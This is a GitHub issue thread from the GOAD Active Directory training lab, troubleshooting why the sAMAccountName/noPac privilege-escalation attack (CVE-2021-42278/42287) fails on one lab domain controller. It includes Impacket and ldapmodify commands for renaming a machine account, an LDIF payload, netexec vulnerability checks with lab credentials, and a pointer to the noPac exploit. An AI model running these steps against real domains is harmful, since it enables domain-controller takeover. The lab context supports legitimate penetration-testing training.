search

Orange-Cyberdefense / GOAD

game of active directory
GNU General Public License v3.0
5.4k stars 746 forks source link

Patch SamAccountName [CVE-2021-42287] #145

Closed AlgunaPseudo closed 11 months ago

AlgunaPseudo commented 11 months ago

Hi,

It would appear that the SamAccountName vulnerability is no longer exploitable on DC02. I've tried to exploit it with Impacket pull requests (https://github.com/SecureAuthCorp/impacket/pull/1202 and https://github.com/SecureAuthCorp/impacket/pull/1224) and also with ldapmodify and in both cases I get an error 00000523 (https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e -> make sure sAMAccountName ends with '$').

Via Impacket :

$ python3 renameMachine.py -current-name 'samaccountname$' -new-name 'winterfell' -dc-ip 'winterfell.north.sevenkingdoms.local' north.sevenkingdoms.local/jon.snow:iknownothing
[...]

[*] Modifying attribute (sAMAccountName) of object (CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local): (samaccountname$) -> (winterfell)
[*] New sAMAccountName does not end with '$' (attempting CVE-2021-42278)
[-] Server probably patched against CVE-2021-42278

Via Ldapsearch :

$ cat modify_samaccountname.ldif
dn: CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local
changetype: modify
replace: sAMAccountName
sAMAccountName: winterfell

$ ldapmodify -x -H ldap://192.168.10.11 -D "jon.snow@north.sevenkingdoms.local" -w iknownothing -f modify_samaccountname.ldif
modifying entry "CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local"
ldap_modify: Other (e.g., implementation specific) error (80)
    additional info: 00000523: SysErr: DSID-031A1242, problem 22 (Invalid argument), data 0

Why DC02? Because this is the example used in mayfly277's write-up.

Mayfly277 commented 11 months ago

i just redo the attack path by copy/pasting the commands from my blog and it work well on a fresh install. image image

Could you try a TGT pac size test with netexec on your instance ? image

i close as it seems to be an issue on your side.

AlgunaPseudo commented 11 months ago

Hi Mayfly,

The command output shows me that the PAC cannot be affected by CVE 2021-42278 :

$ netexec smb winterfell.north.sevenkingdoms.local -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M nopac
SMB         192.168.10.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.10.11   445    WINTERFELL       [+] north.sevenkingdoms.local\jon.snow:iknownothing 
NOPAC       192.168.10.11   445    WINTERFELL       TGT with PAC size 1743
NOPAC       192.168.10.11   445    WINTERFELL       TGT without PAC size 1743

I hadn't specified it, but my lab was setup on Proxmox (following your doc). Perhaps there's a difference with the lab set up locally via viagrant?

Mayfly277 commented 11 months ago

Sad :/ , certainly the image you take (or the link i provide) for setting up the lab is more recent and patched. imo you can try on essos if it work.

AlgunaPseudo commented 11 months ago

Indeed, it works on essos!

$ netexec smb meereen.essos.local -u khal.drogo -p horse -d essos.local -M nopac
SMB         192.168.10.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB         192.168.10.12   445    MEEREEN          [+] essos.local\khal.drogo:horse 
NOPAC       192.168.10.12   445    MEEREEN          TGT with PAC size 1465
NOPAC       192.168.10.12   445    MEEREEN          TGT without PAC size 708
NOPAC       192.168.10.12   445    MEEREEN          
NOPAC       192.168.10.12   445    MEEREEN          VULNERABLE
NOPAC       192.168.10.12   445    MEEREEN          Next step: https://github.com/Ridter/noPac

(thank you Microsoft for not patching Windows Server 2016)

Thanks for your feedback